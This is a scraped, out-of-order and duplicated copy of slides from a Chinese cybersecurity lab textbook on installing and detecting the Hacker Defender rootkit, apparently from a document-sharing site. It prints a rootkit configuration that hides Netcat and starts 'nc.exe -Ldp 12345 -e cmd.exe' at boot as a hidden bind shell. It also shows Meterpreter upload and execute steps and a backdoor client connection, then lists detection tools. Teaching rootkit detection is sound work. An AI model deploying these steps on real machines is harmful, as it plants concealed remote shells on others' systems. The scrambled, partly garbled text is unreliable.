网络空间安全技术实践教程 (40)
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
网络空间安全技术实践教程
吕秋云,王小军,胡耿然,汪云路,王秋华 西安电子科技大学出版社
第四篇 渗透攻击测试实验篇
第十五章 漏洞利用实验 15.3 Rootkit利用与检测实验
网络空间安全技术实践教程
2
15.3 Rootkit利用与检测实验
实验目的: 了解Rootkit的工作原理和功能,熟悉常
见Rootkit以及Rootkit检测工具的使用。
[Hidden Table]:要隐藏的文件、文件夹、进程,其中的所有条目 对Windows资源管理器和文件管理器来说都是隐藏的。 [Root Processes]:用来与客户端交互的进程,通常是隐藏的。 [Hidden Services]:要隐藏的服务,其中的所有服务都不会出现在 服务列表中。 [Hidden RegKeys]:要隐藏的注册表条目。 [Startup Run]:系统每次启动时运行的程序。 [Hidden Ports]:要隐藏的端口号。
网络空间安全技术实践教程
16
15.3 Rootkit利用与检测实验
实验视频:
网络空间安全技术实践教程
17
bdcli100.exe:客户端软件,用于连接后门
Hxdef100.exe:配置文件。配置隐藏的文件、文件夹、进 程,配置自动运行的程序,配置连接后门的密码等信息。
网络空间安全技术实践教程
6
15.3 Rootkit利用与检测实验
实验要点说明:(实验难点说明)
Hacker Defender的配置及使用
网络空间安全技术实践教程
14
15.3 Rootkit利用与检测实验
实验要求:
使用Hacker Defender在Windows系统上留取 Rootkit,并使用Rootkit检测工具进行分析和清 除。
网络空间安全技术实践教程
15
15.3 Rootkit利用与检测实验
实验扩展要求:
学习Windows和Linux平台下常见的Rootkit软 件及其使用。。
实验步骤:
(1)hxdef100.ini采取的配置如下(这里仅 给出了修改的部分):
[Hidden Table] hxdef* rcmd.exe rk nc.exe
[Startup Run] C:\rk\nc.exe?-Ldp 12345 -e C:\WINDOWS\system32\cmd.exe ……
网络空间安全技术实践教程
9
15.3 Rootkit利用与检测实验
实验步骤: (1)配置hxdef100.ini文件,利用 Meterpreter把Netcat,hxdef100.exe, hxdef100.ini上传到目标计算机。
网络空间安全技术实践教程
10
15.3 Rootkit利用与检测实验
网络空间安全技术实践教程
3
15.3 Rootkit利用与检测实验
实验原理: Rootkit通常是一组恶意计算机软件的集
合,运行于操作系统的底层内核之中。 Rootkit可以实现多种功能,完成比如隐藏文 件、进程以及程序,提权,记录键盘,安装 后门等恶意行的任务。
网Fra Baidu bibliotek空间安全技术实践教程
4
15.3 Rootkit利用与检测实验
实验要点说明:(实验难点说明)
Hacker Defender的配置及使用
Hacker Defender是一个Windows Rootkit,主要包含3个 文件:hxdef100.exe、hxdef100.ini、bdcli100.exe。 hxdef100.exe:在目标计算机上运行Hacker Defender
[Root Processes] hxdef*
[Hidden Ports] TCP:12345
rcmd.exe
nc.exe
……
网络空间安全技术实践教程
11
15.3 Rootkit利用与检测实验
实验步骤: (2)用“execute –f hxdef100.exe”命令运 行Hacker DeHfaecknerdDeefern,der运运行行之前后将会根据配置文 件进行相关隐藏。
Hacker Defender运行之后
网络空间安全技术实践教程
12
15.3 Rootkit利用与检测实验
实验步骤: (3)与留下的后门进行交互。
当hxdef100.exe在目标计算机运行后,会尝试在开放的端口 上安装后门程序,供bdcli100.exe连接。这里假设目标计算 机上的80端口开放,并且成功地被hxdef100.exe安装了后门 程序,我们可以运行客户端程序bdcli00.exe连接该后门
。
网络空间安全技术实践教程
7
15.3 Rootkit利用与检测实验
实验要点说明:(实验难点说明)
常见Rootkit检测工具的使用
网络空间安全技术实践教程
8
15.3 Rootkit利用与检测实验
实验准备: (实验环境,实验先有知识技 术说明)
Kali Linux Hacker Defender Windows XP(靶机)
实验原理:
计算机系统中与用户进行交互的软件, 通常其功能是在操作系统中较高层上实现的。 当它们执行任务时,经常会向操作系统中较 底层的服务发送请求,而Rootkit运行于系统 底层,可以通过“挂钩”或拦截软件等工具 拦截这些请求,并修改系统的正常响应,完 成各种恶意目的。
网络空间安全技术实践教程
5
15.3 Rootkit利用与检测实验
bdcli100.exe连接后门
网络空间安全技术实践教程
13
15.3 Rootkit利用与检测实验
实验步骤: (4)Rootkit的检测
Rootkit的手工检测难度较大,需要深入理解操作系统工作原 理,这里仅介绍一些常用的Rootkit检测工具: Windows平台:GMER,Ice Sword,Rootkit Revealer, Blacklight等。 Linux平台:Rootkit Hunter,Chkrootkit等。
吕秋云,王小军,胡耿然,汪云路,王秋华 西安电子科技大学出版社
第四篇 渗透攻击测试实验篇
第十五章 漏洞利用实验 15.3 Rootkit利用与检测实验
网络空间安全技术实践教程
2
15.3 Rootkit利用与检测实验
实验目的: 了解Rootkit的工作原理和功能,熟悉常
见Rootkit以及Rootkit检测工具的使用。
[Hidden Table]:要隐藏的文件、文件夹、进程,其中的所有条目 对Windows资源管理器和文件管理器来说都是隐藏的。 [Root Processes]:用来与客户端交互的进程,通常是隐藏的。 [Hidden Services]:要隐藏的服务,其中的所有服务都不会出现在 服务列表中。 [Hidden RegKeys]:要隐藏的注册表条目。 [Startup Run]:系统每次启动时运行的程序。 [Hidden Ports]:要隐藏的端口号。
网络空间安全技术实践教程
16
15.3 Rootkit利用与检测实验
实验视频:
网络空间安全技术实践教程
17
bdcli100.exe:客户端软件,用于连接后门
Hxdef100.exe:配置文件。配置隐藏的文件、文件夹、进 程,配置自动运行的程序,配置连接后门的密码等信息。
网络空间安全技术实践教程
6
15.3 Rootkit利用与检测实验
实验要点说明:(实验难点说明)
Hacker Defender的配置及使用
网络空间安全技术实践教程
14
15.3 Rootkit利用与检测实验
实验要求:
使用Hacker Defender在Windows系统上留取 Rootkit,并使用Rootkit检测工具进行分析和清 除。
网络空间安全技术实践教程
15
15.3 Rootkit利用与检测实验
实验扩展要求:
学习Windows和Linux平台下常见的Rootkit软 件及其使用。。
实验步骤:
(1)hxdef100.ini采取的配置如下(这里仅 给出了修改的部分):
[Hidden Table] hxdef* rcmd.exe rk nc.exe
[Startup Run] C:\rk\nc.exe?-Ldp 12345 -e C:\WINDOWS\system32\cmd.exe ……
网络空间安全技术实践教程
9
15.3 Rootkit利用与检测实验
实验步骤: (1)配置hxdef100.ini文件,利用 Meterpreter把Netcat,hxdef100.exe, hxdef100.ini上传到目标计算机。
网络空间安全技术实践教程
10
15.3 Rootkit利用与检测实验
网络空间安全技术实践教程
3
15.3 Rootkit利用与检测实验
实验原理: Rootkit通常是一组恶意计算机软件的集
合,运行于操作系统的底层内核之中。 Rootkit可以实现多种功能,完成比如隐藏文 件、进程以及程序,提权,记录键盘,安装 后门等恶意行的任务。
网Fra Baidu bibliotek空间安全技术实践教程
4
15.3 Rootkit利用与检测实验
实验要点说明:(实验难点说明)
Hacker Defender的配置及使用
Hacker Defender是一个Windows Rootkit,主要包含3个 文件:hxdef100.exe、hxdef100.ini、bdcli100.exe。 hxdef100.exe:在目标计算机上运行Hacker Defender
[Root Processes] hxdef*
[Hidden Ports] TCP:12345
rcmd.exe
nc.exe
……
网络空间安全技术实践教程
11
15.3 Rootkit利用与检测实验
实验步骤: (2)用“execute –f hxdef100.exe”命令运 行Hacker DeHfaecknerdDeefern,der运运行行之前后将会根据配置文 件进行相关隐藏。
Hacker Defender运行之后
网络空间安全技术实践教程
12
15.3 Rootkit利用与检测实验
实验步骤: (3)与留下的后门进行交互。
当hxdef100.exe在目标计算机运行后,会尝试在开放的端口 上安装后门程序,供bdcli100.exe连接。这里假设目标计算 机上的80端口开放,并且成功地被hxdef100.exe安装了后门 程序,我们可以运行客户端程序bdcli00.exe连接该后门
。
网络空间安全技术实践教程
7
15.3 Rootkit利用与检测实验
实验要点说明:(实验难点说明)
常见Rootkit检测工具的使用
网络空间安全技术实践教程
8
15.3 Rootkit利用与检测实验
实验准备: (实验环境,实验先有知识技 术说明)
Kali Linux Hacker Defender Windows XP(靶机)
实验原理:
计算机系统中与用户进行交互的软件, 通常其功能是在操作系统中较高层上实现的。 当它们执行任务时,经常会向操作系统中较 底层的服务发送请求,而Rootkit运行于系统 底层,可以通过“挂钩”或拦截软件等工具 拦截这些请求,并修改系统的正常响应,完 成各种恶意目的。
网络空间安全技术实践教程
5
15.3 Rootkit利用与检测实验
bdcli100.exe连接后门
网络空间安全技术实践教程
13
15.3 Rootkit利用与检测实验
实验步骤: (4)Rootkit的检测
Rootkit的手工检测难度较大,需要深入理解操作系统工作原 理,这里仅介绍一些常用的Rootkit检测工具: Windows平台:GMER,Ice Sword,Rootkit Revealer, Blacklight等。 Linux平台:Rootkit Hunter,Chkrootkit等。